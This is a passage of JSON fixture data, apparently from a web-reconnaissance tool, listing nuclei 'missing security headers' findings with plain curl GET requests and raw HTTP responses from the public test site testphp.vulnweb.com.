"2024-11-13T02:41:50.982Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 730, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:41:51.147Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 731, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:41:51.301Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 732, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:51.454Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 733, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:41:51.616Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 734, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:51.776Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 735, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:41:51.936Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 736, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:41:52.106Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 737, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:41:52.275Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 738, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:41:52.441Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 739, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:41:52.607Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 740, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:41:52.766Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 741, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:41:52.941Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 742, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:41:53.130Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , 